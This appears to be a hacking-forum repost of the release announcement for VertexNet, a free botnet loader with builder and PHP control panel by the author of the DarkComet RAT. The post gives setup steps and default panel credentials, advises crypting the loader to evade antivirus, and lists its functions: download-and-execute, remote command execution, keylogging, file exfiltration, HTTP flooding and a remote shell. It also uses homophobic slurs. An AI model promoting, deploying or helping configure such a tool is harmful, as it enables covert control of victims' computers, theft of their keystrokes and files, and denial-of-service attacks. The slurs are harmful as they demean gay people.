(adsbygoogle = window.adsbygoogle || []).push({});You must login or register to view this content.
Download from DarkCoderSC's official website, unremote.org: You must login or register to view this content.
Released 1 week ago this new loader is still in beta.
Exact quotation of DarkCoderSC's website and his OpenSC release thread: You must login or register to view this content.
All credit to DarkCoderSC, Coder of the illustrious and infamous DarkComet RAT
Hello guy's finally after some weeks of word i decide to release a little beta of one of my new project called VertexNet.
VertexNet as Vertex in mathematics and Net as Network (Nothing to have with .NET of course LOL, .NET is for gay's).
The whole project is coded by DarkCoderSc.
This project is totally made from scratch , when i said totally it is 100% totally in the sens that i never open another bot/loader source and understand how exactly they was working and doing to send information to a web panel etc... my goal was to learn how to by re doing the whole principle like if i was the first to create a web based loader, what i see by reading some nice articles about botnet on the web is that they use GET and POST http methods to notice connections and send some data from loader to panel then easily i made it.
This project tooks me about a month to finalize the first beta version and 2 week end of 13-14 hour coding non stop per day but what i can said is that coding this without any base in loader really expand my knowledge then it was a good exercise.
/!\ Notice i don't know if my method of data get/send is the right way to do or if maybe is better just let me know ;-).
--
About the software
--
There is three parts in the package :
- the Builder
- The loader inside the builder
- the HTML/CSS/PHP sources for the panel
The builder :
This will help you to configure your loader , it is beta actually there is only a few amount of settings but really easy to understand , follow the little hints to be sure all is correctly setup.
This builder is coded in Delphi using CodeGear Delphi XE and i used for fun the last win7 taskbar button API =p .
The loader :
This is the small program that will send/retrieve info from/to the web panel , it is like the server part of a RAT.
The loader is coded in C++ using Code::Blocks with mingw compiler.
(I didn't used any stream library to prevent a huge size)
Size unpacked is ~100ko , compressed is very very small and still stable.
I choose C++ as language for this project cause i code C++ since a long time but i never release some security soft , so as a friend said it is a shame to have a knowledge in C++ and don't use it instead of Delphi all the time.
Also C++ is faster/smaller and more stable than any other language.
The panel :
The panel sources is what you need to upload to your FTP and install to control your loaders.
INSTALLATION instruction :
Upload the whole content of the dir in your chosen web server.
Then edit the file /inc/connection.inc.php and replace with the correct settings via the comments.
Then open PHPmyadmin , create a new database and go to SQL tab then past the content of the file _SQL_NOT_UPLOAD/db.sql in it and click on run.
Then you can start using the panel (soon i will code a little auto installer)
Important notice :
Default user/pass for login panel are :
username : root
password : toor
Panel is coded using some CSS(CSS3) , HTML , Javascript and PHP.
the PHP is obfuscated to prevent copy past biatchs.
i didn't take the time to to the same for HTML/CSS/JS then if you pick some piece of code credits.
The best browser to use are :
please guy's stop using IE8 and older ones, thats for fags and the design will be ugly.
The whole software isn't open source and will never be , also don't contacting me for private FUD release i will ignore your request i don't sell anything then if you wan't a FUD manage yourself to crypt it.
Before giving some more infos :
Why this product is free ? , simply because i'm bored to see some people selling some craps for 300€ as it worth 2$. So i wan't to make a good loader but for free.
Functions :
Notice : Functions that can take a while are of course multi threaded (such as downloader,flooder,keylogger,process list etc etc...)
Also i will never implement formgrabers cause everybody know what is it for , and i'm not masochist and don't want to be ****ed in jail cause of fagots users that pretend to be hecker by stealing people money and after being cough.
/!\ All command list/detail are in the panel in commands tabs, commands are case sensitive then respect the whole syntax.
- Send messagebox (for debug/test)
- Execute any kind of command (same as execute dialogue)
- close loader process
- Download file and execute
- Get process list
- Get modules list from PID
- Set keylogger status ON/OFF (no dll hooks and record whole chars even symbols combinations)
- Retrieve keylogger logs
- Read file content and retrieve it
- Uninstall loader
- Httpflood same technologies as i used on darkcomet then it is very powerfull
- Remote shell
- Visit webpage
I will add more commands soon, any suggestions will be really appreciated but don't ask for help i'm to much busy and all infos are there.
Comming soon :
- FWB
- More commands
- Panel Installer
- More possibility's in webpanel
- User manager in panel
- plugins support
- and more.